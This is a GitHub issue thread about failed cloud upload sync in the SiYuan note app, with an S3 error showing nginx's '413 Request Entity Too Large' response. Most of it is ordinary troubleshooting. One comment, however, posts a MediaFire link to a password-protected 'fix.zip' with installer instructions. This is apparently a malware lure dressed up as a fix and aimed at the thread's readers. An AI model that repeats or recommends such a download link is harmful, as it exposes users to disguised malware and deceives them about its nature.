### ISSUE TITLE
进行上传同步失败

### ISSUE THREAD

**Issue by AlexZhoushaocheng** [siyuan-note/siyuan#12337]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Can the issue be reproduced with the default theme (daylight/midnight)?

- [X] I was able to reproduce the issue with the default theme

### Could the issue be due to extensions?

- [X] I've ruled out the possibility that the extension is causing the problem.

### Describe the problem

upload同步失败
点击云同步进行upload同步，报错。

### Expected result

同步正常完成

### Screenshot or screen recording presentation

SerializationError: failed to unmarshal error message status code: 413, request id: , host id: caused by: UnmarshalError: failed to unmarshal error message 00000000 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 |<html>..<head><t| 00000010 69 74 6c 65 3e 34 31 33 20 52 65 71 75 65 73 74 |itle>413 Request| 00000020 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 | Entity Too Larg| 00000030 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e |e</title></head>| 00000040 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 |..<body>..<cente| 00000050 72 3e 3c 68 31 3e 34 31 33 20 52 65 71 75 65 73 |r><h1>413 Reques| 00000060 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 |t Entity Too Lar| 00000070 67 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e |ge</h1></center>| 00000080 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 |..<hr><center>ng| 00000090 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 |inx/1.24.0</cent| 000000a0 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f |er>..</body>..</| 000000b0 68 74 6d 6c 3e 0d 0a |html>..| caused by: expected element type <Error> but have <html> (Provider: S3) v3.1.2

### Version environment

```markdown
- Version: 3.1.2
- Operating System: windows
- Browser (if used):
```

### Log file

[siyuan.log](https://github.com/user-attachments/files/16746224/siyuan.log)

### More information
进行下载更新是可以正常完成的。
_No response_

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by AlexZhoushaocheng** [comment]
> gcc.

![image](https://github.com/user-attachments/assets/6736bbea-b5ee-4639-9fc4-decfe75faab5)

**Comment by 88250** [comment]
建议排查云端存储配置的权限是否充足，并将思源加入防火墙信任列表。

**Comment by AlexZhoushaocheng** [comment]
same as https://ld246.com/article/1681181341509
